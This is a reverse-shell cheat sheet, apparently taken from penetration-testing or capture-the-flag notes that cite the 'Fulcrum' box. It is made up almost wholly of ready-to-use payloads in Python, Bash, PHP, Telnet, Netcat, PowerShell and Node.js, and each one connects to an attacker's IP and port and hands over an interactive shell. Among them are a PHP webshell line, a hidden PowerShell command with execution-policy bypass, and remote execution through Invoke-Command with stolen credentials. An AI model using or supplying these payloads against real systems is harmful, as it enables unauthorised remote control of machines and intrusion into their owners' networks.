Python
```bash
# dup2() points fd 0/1/2 at the connected socket before the interactive shell is spawned
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Bash
```bash
# Needs bash on the target: /dev/tcp is a bash built-in, not a real device
/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<attacker_PORT> 0>&1'
```
PHP
Example 1 (inside a PHP file, e.g. an uploaded webshell):

```php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'");?>
```

Example 2 (from the command line; `<&3 >&3 2>&3` assumes the socket is the first descriptor opened after stdin/stdout/stderr, i.e. fd 3, which holds for a fresh `php -r` process):

```bash
php -r '$sock=fsockopen("<attacker_IP>",<attacker_PORT>); exec("/bin/sh -i <&3 >&3 2>&3");'
```
Example: Fulcrum
Telnet
Two listeners are needed on the attacker side: commands typed into the one on 4444 are piped into bash, and bash's output comes back on the one on 4445.

```bash
telnet <attacker_IP> 4444 | /bin/bash | telnet <attacker_IP> 4445
```
Netcat
```bash
# Only works with netcat builds that keep the -e (exec) option
nc <attacker_IP> <attacker_PORT> -e /bin/sh
```
Netcat w/o "-e" option

The named pipe closes the loop: nc writes what it receives into /tmp/f, cat feeds that to the shell, and the shell's output (stderr merged) goes back out through nc.

```bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker_IP> <attacker_PORT> > /tmp/f
```
Powershell
From a non-PowerShell CLI (e.g. cmd.exe or a webshell), we can execute our reverse shell with this command. Note that the `TCPClient` object must be assigned to `$client`, otherwise the following `$client.GetStream()` call fails:

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.10.16.3",2345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
If we are on a PowerShell CLI, we can execute this one instead (it runs the same loop on a remote host via WinRM; `$Creds` is a PSCredential for file.fulcrum.local created beforehand):

```powershell
Invoke-Command -ComputerName file.fulcrum.local -Credential $Creds -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.16.3',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
```
Examples: Fulcrum
Node JS
```javascript
// Spawns /bin/sh and wires its stdin/stdout/stderr to a TCP socket back to the attacker
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.10.14.2", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```
Firefox Plugin
An excellent plugin for crafting the different reverse shell payloads above directly from Firefox: hacktools.